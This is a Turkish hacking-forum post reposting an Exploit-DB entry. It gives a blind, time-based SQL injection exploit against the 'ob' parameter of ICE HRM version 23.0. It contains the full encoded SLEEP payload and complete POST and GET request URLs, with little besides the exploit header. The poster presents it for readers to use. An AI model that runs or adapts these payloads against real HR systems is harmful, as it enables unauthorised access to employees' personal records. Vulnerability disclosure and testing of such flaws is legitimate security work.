İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

ICE HRM 23.0 - Multiple Vulnerabilities

16-03-2019 03:58
#1
deargod - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
vice city
Mesajlar:
167
Teşekkür (Etti):
20
Teşekkür (Aldı):
36
Konular:
15
Ticaret:
(0) %
# Exploit Title/Exploit Başlığı: ICE HRM - ’ob’ SQL Inj.
# Dork: N/A
# Date/Tarih: 14-03-2019
# Exploit Author/Exploit Yazarı: Mehmet EMIROGLU
# Vendor Homepage/Yapımcı Sitesi: IceHrm – A Powerful But Simple App to Manager Your Company and Employees
# Software Link/Yazılım Linki: https://sourceforge.net/projects/icehrm/
# Version/Versiyon: v23.0
# Category/Kategori: Webapps
# Tested on/Test Edilen Sistem: Wamp64, Windows
# CVE: N/A
# Software Description/Yazılım Bilgisi: ICE HRM bir şirket yöneticisinin çalışanları kontrol edebileceği bir içerik yönetim sistemidir.PHP ve Javascript ile yazılmıştır.


# POC - SQLi (blind)
# Parameters : ob
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27 XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c %22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22 *%2f
# POST Method : http://localhost/icehrmv23OS/app/service.php


**Aynı açıktan faydalanarak şunu da kullanabilirsiniz: **

# POC - SQLi (blind)
# Parameters : ob
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27 XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c %22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22 *%2f
# GET Method :
http://localhost/icehrmv23OS/app/dat...ationality%22:[%22Nationality%22,%22id%22,%22name%22],%22ethnicity%22:[%22Ethnicity%22,%22id%22,%22name%22],%22immigration_status%22:[%22ImmigrationStatus%22,%22id%22,%22name%22],%22employment_status%22:[%22EmploymentStatus%22,%22id%22,%22name%22],%22job_title%22:[%22JobTitle%22,%22id%22,%22name%22],%22pay_grade%22:[%22PayGrade%22,%22id%22,%22name%22],%22country%22:[%22Country%22,%22code%22,%22name%22],%22province%22:[%22Province%22,%22id%22,%22name%22],%22department%22:[%22CompanyStructure%22,%22id%22,%22title%22],%22supervisor%22:[%22Employee%22,%22id%22,%22first_name%20last_name% 22]%7D&cl=[%22id%22,%22image%22,%22employee_id%22,%22first_na me%22,%22last_name%22,%22mobile_phone%22,%22depart ment%22,%22gender%22,%22supervisor%22]&ft=%7B%22status%22:%22Active%22%7D&ob=1%20%2b%20( (SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%2 7XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)) )OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SL EEP(25))A)))OR%22*%2f



# Exploit Linki : https://www.exploit-db.com/exploits/46548
Kullanıcı İmzası
"Ulusal egemenlik öyle bir nurdur ki, onun karşısında zincirler erir, taç ve tahtlar yanar, mahvolur."
Mustafa Kemal ATATÜRK

telegram: deargod_tht


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı